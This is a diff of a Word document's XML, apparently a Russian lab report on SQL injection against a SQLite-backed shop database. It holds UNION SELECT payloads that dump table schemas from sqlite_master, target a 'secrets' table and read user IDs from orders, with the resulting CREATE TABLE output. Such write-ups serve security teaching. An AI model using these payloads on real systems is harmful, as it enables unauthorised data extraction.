-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>n</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>ote</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> TEXT NOT NULL DEFAULT '',</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
-        <w:ind w:left="360" w:firstLine="348"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>FOREI</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
-        <w:ind w:left="357"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
-        <w:ind w:left="360"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Узнаем</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>структуру</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>таблицы</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>order</w:t>
-      </w:r>
-      <w:r>
-        <w:t>_</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>items</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">– </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
-        <w:ind w:left="360"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>' UNION</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> SELECT </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>sql,NULL,NULL</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> FROM </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>sqlite_master</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> WHERE name='</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>order_items</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>'--</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
-        <w:ind w:left="360"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Результат</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> – </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
-        <w:ind w:left="360"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">CREATE TABLE </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>order_items</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
-        <w:ind w:left="360" w:firstLine="348"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>id</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> INTEG</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>ER PRIMARY KEY AUTOINCREMENT,</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
-        <w:ind w:left="360" w:firstLine="348"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>order_id</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> INTEGER NOT NULL,</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
-        <w:ind w:left="360" w:firstLine="348"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>product_i</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>d</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> INTEGER NOT NULL,</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
-        <w:ind w:left="360" w:firstLine="348"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>qty</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> INTEGER NOT NULL,</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
-        <w:ind w:left="360" w:firstLine="348"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>unit_</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>price_cents</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> INTEGER NOT NULL,</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
-        <w:ind w:left="360" w:firstLine="348"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>nam</w:t>
       </w:r>
       <w:bookmarkStart w:id="0" w:name="_GoBack"/>
       <w:bookmarkEnd w:id="0"/>
-      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ER NOT NULL,</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
+        <w:ind w:left="360" w:firstLine="348"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>created_at</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> INTEGER NOT NULL,</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
+        <w:ind w:left="360" w:firstLine="348"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>total_cents</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> INTEGER NOT NULL,</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
+        <w:ind w:left="360" w:firstLine="348"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>n</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ote TEXT NOT NULL DEFAULT '',</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
+        <w:ind w:left="360" w:firstLine="348"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>FOREI</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">' UNION SELECT </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>user_</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>id</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>,NULL</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>,NULL</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> FROM </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>sqlite_master</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">LIMIT 1 OFFSET </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>4--</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">' UNION SELECT </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>user_</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>id</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>,NULL</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>,NULL</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> FROM </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>orders</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> LIMIT 1 OFFSET </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>4--</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3155,60 +3108,351 @@
         <w:pStyle w:val="a3"/>
         <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
         <w:ind w:left="360"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:t>Узнаем</w:t>
       </w:r>
       <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:t>структуру</w:t>
       </w:r>
       <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:t>таблицы</w:t>
       </w:r>
       <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
+        <w:t>order</w:t>
+      </w:r>
+      <w:r>
+        <w:t>_</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>items</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> – </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">' UNION SELECT </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>sql,NULL</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>,NULL</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> FROM </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>sqlite_master</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> WHERE name='</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>order_items</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>'--</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>Результат</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> – </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">CREATE TABLE </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>order_items</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
+        <w:ind w:left="360" w:firstLine="348"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>id INTEG</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ER PRIMARY KEY AUTOINCREMENT,</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
+        <w:ind w:left="360" w:firstLine="348"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>order_id</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> INTEGER NOT NULL,</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
+        <w:ind w:left="360" w:firstLine="348"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>product_i</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>d</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> INTEGER NOT NULL,</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
+        <w:ind w:left="360" w:firstLine="348"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>qty</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> INTEGER NOT NULL,</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
+        <w:ind w:left="360" w:firstLine="348"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>unit_</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>price_cents</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> INTEGER NOT NULL,</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
+        <w:ind w:left="360" w:firstLine="348"/>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>nam</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
+        <w:ind w:left="357"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
+        <w:ind w:left="357"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
+        <w:ind w:left="360"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Узнаем</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>структуру</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>таблицы</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
         <w:t>secrets</w:t>
       </w:r>
       <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>–</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve"> – </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3220,26 +3464,26 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">' UNION SELECT </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>' UNION</w:t>
+        <w:t>sql,NULL</w:t>
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> SELECT </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
